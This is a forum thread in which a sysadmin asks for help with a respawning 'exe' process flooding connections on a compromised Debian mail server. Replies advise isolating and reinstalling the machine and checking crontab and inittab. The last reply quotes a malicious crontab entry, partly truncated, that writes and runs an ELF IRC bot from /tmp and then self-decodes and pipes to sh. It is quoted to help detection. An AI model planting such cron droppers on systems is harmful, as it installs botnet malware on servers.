How to stop the nasty process "EXE" creating endless number of connections - Security

This is a discussion on How to stop the nasty process "EXE" creating endless number of connections - Security ; Something nasty has probably been done with one of our emailservers. There is a process called > "popping up" which creates an endless number of connections in a few seconds causing our firewall to be "full" (Conntrack table full") Killing ...

+ Reply to Thread
Results 1 to 7 of 7

Thread: How to stop the nasty process "EXE" creating endless number of connections

  1. How to stop the nasty process "EXE" creating endless number of connections

    Something nasty has probably been done with one of our emailservers.

    There is a process called <> "popping up" which creates an endless
    number of connections in a few seconds causing our firewall to be "full"
    (Conntrack table full")

    Killing the process solves the problem temporarily but it does start again
    by itself, sometimes in one minute and sometimes after two days.

    The machine is a debian server with kernel 2.6. It is running apache
    webserver with PHP, postfix mailserver together with spamassassin and
    amavis.

    Searching old posts give us some suggestions but nothing which solves the
    problem.

    Any idas?

    We do appriciate your help with this.

    Best regards.

    // Martin Rdbo
    Teknologia




  2. Re: How to stop the nasty process "EXE" creating endless number of connections

    Martin Rådbo wrote:

    > Something nasty has probably been done with one of our emailservers.
    >
    > There is a process called <> "popping up" which creates an endless
    > number of connections in a few seconds causing our firewall to be "full"
    > (Conntrack table full")
    >
    > Killing the process solves the problem temporarily but it does start again
    > by itself, sometimes in one minute and sometimes after two days.
    >


    If you know that this is malware then you also know that your box has been
    compromised. You *should* know what to do with a compromised machine (hint:
    you don't wait for responses to to an NNTP post).

    Since this is 'one' of your emailservers you have the tools to identify
    whether 'exe' is malware - it certainly seems to be.

    C.

  3. Re: How to stop the nasty process "EXE" creating endless number of connections

    Hi.

    If we had known exactly what to do then I wouldn't have asked you guys for
    advice...

    We are not 100 % sure this is malware but it seem to be. That's why we ask
    you. Of course we have change the root password and similar staff but that
    did not help either.

    I know I have seen this problem before but can not remember where I read
    about it. Please help us if you have the information.

    Thanks in advance

    yours sincerely
    // Martin Rådbo
    Teknologia


    "Colin McKinnon"
    skrev i
    meddelandet news:iVjsf.24293$Dg6.5192@newsfe3-gui.ntli.net...
    : Martin Rådbo wrote:
    :
    : > Something nasty has probably been done with one of our emailservers.
    : >
    : > There is a process called <> "popping up" which creates an endless
    : > number of connections in a few seconds causing our firewall to be "full"
    : > (Conntrack table full")
    : >
    : > Killing the process solves the problem temporarily but it does start
    again
    : > by itself, sometimes in one minute and sometimes after two days.
    : >
    :
    : If you know that this is malware then you also know that your box has been
    : compromised. You *should* know what to do with a compromised machine
    (hint:
    : you don't wait for responses to to an NNTP post).
    :
    : Since this is 'one' of your emailservers you have the tools to identify
    : whether 'exe' is malware - it certainly seems to be.
    :
    : C.


  4. Re: How to stop the nasty process "EXE" creating endless number ofconnections

    Martin Rådbo wrote:
    > Hi.
    >
    > If we had known exactly what to do then I wouldn't have asked you guys for
    > advice...


    The *first* thing to do if you think a machine is compromised is to take
    it off the network. It could well be spreading infection or spewing out
    spam or being used to attack someone else.

    > We are not 100 % sure this is malware but it seem to be. That's why we ask
    > you. Of course we have change the root password and similar staff but that
    > did not help either.


    Of course it won't if it has been compromised.

    > I know I have seen this problem before but can not remember where I read
    > about it. Please help us if you have the information.


    If you suspect a compromise, take the machine off the network. If you
    know it is compromised, reformat and install from clean sources.

    As Colin implied, but did not explicitly state, if you have multiple
    mail servers you can compare the behaviour of the different mail servers.

    Also, you should know what processes are meant to be running on your
    servers. If you don't, then you are in a very poor position to maintain
    them or detect any problems.

    > "Colin McKinnon"
    > skrev i
    > meddelandet news:iVjsf.24293$Dg6.5192@newsfe3-gui.ntli.net...
    > : Martin Rådbo wrote:
    > :
    > : > Something nasty has probably been done with one of our emailservers.
    > : >
    > : > There is a process called <> "popping up" which creates an endless
    > : > number of connections in a few seconds causing our firewall to be "full"
    > : > (Conntrack table full")
    > : >
    > : > Killing the process solves the problem temporarily but it does start
    > again
    > : > by itself, sometimes in one minute and sometimes after two days.
    > : >
    > :
    > : If you know that this is malware then you also know that your box has been
    > : compromised. You *should* know what to do with a compromised machine
    > (hint:
    > : you don't wait for responses to to an NNTP post).
    > :
    > : Since this is 'one' of your emailservers you have the tools to identify
    > : whether 'exe' is malware - it certainly seems to be.

    --
    Flash Gordon
    Living in interesting times.
    Although my email address says spam, it is real and I read it.

  5. Re: How to stop the nasty process "EXE" creating endless number of connections

    In addition to what everybody else has said, it might be a good idea
    (if you haven't already done so) to check your crontab file. Since it
    fires repeatedly, your problem may be there.

    If you removed the cron entry and it still fired up (assuming you are
    still on the network), then if you are running a kerberos server, then
    that may also compromised.


  6. Re: How to stop the nasty process "EXE" creating endless number of connections

    slackware guy wrote:

    > In addition to what everybody else has said, it might be a good idea
    > (if you haven't already done so) to check your crontab file. Since it
    > fires repeatedly, your problem may be there.
    >
    > If you removed the cron entry and it still fired up (assuming you are
    > still on the network), then if you are running a kerberos server, then
    > that may also compromised.


    As well as /etc/inittab

    Look for any lines that have respawn in them. Some belong -- another may
    not with the (exe) in it.

  7. Re: How to stop the nasty process "EXE" creating endless number of connections

    *** Martin Rdbo wrote:
    > Something nasty has probably been done with one of our emailservers.
    >
    > There is a process called <> "popping up" which creates an endless
    > number of connections in a few seconds causing our firewall to be "full"
    > (Conntrack table full")
    >
    > Killing the process solves the problem temporarily but it does start again
    > by itself, sometimes in one minute and sometimes after two days.


    Look at the crontab (the crontab of that user, the process <> is running under).

    Perhaps you have an entry like this:

    # "\177\105\114\10 [...] \000\37777777777" > /tmp/tblihjauk ; chmod \
    700 /tmp/tblihjauk ; /tmp/tblihjauk x ; rm -f /tmp/tblihjauk
    34 * * * * /bin/echo `crontab -l|grep '.\{666\}'|sed 's/^./echo -e -n/'`|sh

    This entry builds a upx(ucl) compressed ELF Binary, a IRCBot. The
    Bot do a connect to a IRC-Server an wait for Instructions.

    It often comes trough unsecure php-scripts if "allow_url_fopen = on".

    We found a few of this the last days ...

    HTH

    Micha

+ Reply to Thread